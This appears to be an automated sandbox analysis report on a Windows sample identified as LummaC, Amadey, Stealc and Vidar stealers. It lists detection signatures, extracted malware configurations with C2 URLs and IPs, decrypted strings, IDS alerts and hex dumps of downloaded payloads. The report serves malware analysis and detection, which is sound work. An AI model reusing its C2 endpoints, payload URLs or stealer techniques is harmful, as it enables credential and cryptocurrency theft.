Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1554768
MD5: 7eb28235d4f5c45e8b81d7e275380e94
SHA1: ccb72493bab5b2c415eb5ff015790f7e2b372c96
SHA256: 9a2dfe9dbf3354fb20245f2ea2b210e1bbda08953243e6fefbf3b08e31fcf20a
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.206/c4becf79229cb002.phpC: Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/def.exeFc Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/pd Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.php& Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/def.exe5 Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/9 Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllI~ Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpR Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpb Avira URL Cloud: Label: malware
Source: http://185.215.113.16/ld Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/F Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.phpv Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/softokn3.dllP Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dll= Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 0000000B.00000002.2207719562.0000000000E11000.00000040.00000001.01000000.0000000E.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 17.2.c3e1e78f6d.exe.6b0000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["3xc1aimbl0w.sbs", "faintbl0w.sbs", "thicktoys.sbs", "300snails.sbs"], "Build id": "LOGS11--public"}
Source: file.exe.7472.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 17.2.c3e1e78f6d.exe.6b0000.0.unpack String decryptor: faintbl0w.sbs
Source: 17.2.c3e1e78f6d.exe.6b0000.0.unpack String decryptor: 300snails.sbs
Source: 17.2.c3e1e78f6d.exe.6b0000.0.unpack String decryptor: 3xc1aimbl0w.sbs
Source: 17.2.c3e1e78f6d.exe.6b0000.0.unpack String decryptor: thicktoys.sbs
Source: 17.2.c3e1e78f6d.exe.6b0000.0.unpack String decryptor: lid=%s&j=%s&ver=4.0
Source: 17.2.c3e1e78f6d.exe.6b0000.0.unpack String decryptor: TeslaBrowser/5.5
Source: 17.2.c3e1e78f6d.exe.6b0000.0.unpack String decryptor: - Screen Resoluton:
Source: 17.2.c3e1e78f6d.exe.6b0000.0.unpack String decryptor: - Physical Installed Memory:
Source: 17.2.c3e1e78f6d.exe.6b0000.0.unpack String decryptor: Workgroup: -
Source: 17.2.c3e1e78f6d.exe.6b0000.0.unpack String decryptor: LOGS11--public
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C5E6C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49856 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2189859471.000000006C64D000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2190107334.000000006C80F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2190107334.000000006C80F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: accd68d705.exe, 00000012.00000002.2663213900.0000000000982000.00000040.00000001.01000000.00000011.sdmp, accd68d705.exe, 00000012.00000003.2528804311.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe, 00000014.00000003.2622010179.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe, 00000014.00000002.2756490960.00000000002A2000.00000040.00000001.01000000.00000014.sdmp, accd68d705.exe, 00000015.00000002.2728250250.0000000000982000.00000040.00000001.01000000.00000011.sdmp, accd68d705.exe, 00000015.00000003.2687812134.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, Q10LTOCEFP0KA6N46594D.exe, 00000016.00000002.2793437431.0000000000652000.00000040.00000001.01000000.00000015.sdmp, Q10LTOCEFP0KA6N46594D.exe, 00000016.00000003.2752613172.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2189859471.000000006C64D000.00000002.00000001.01000000.0000000A.sdmp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 13MB later: 41MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49735 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49735 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49735
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49735 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49735
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49735 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49781 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49794
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49807 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49817 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49815 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49812 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49821 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49833 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49851 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49806 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49806 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49809 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49809 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49823 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49816 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49842 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49842 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49844 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49844 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49836 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49834 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49856 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49847 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49819 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49854 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49820 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49820 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49822 -> 172.67.150.243:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49822 -> 172.67.150.243:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: 3xc1aimbl0w.sbs
Source: Malware configuration extractor URLs: faintbl0w.sbs
Source: Malware configuration extractor URLs: thicktoys.sbs
Source: Malware configuration extractor URLs: 300snails.sbs
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 20:21:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 20:21:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 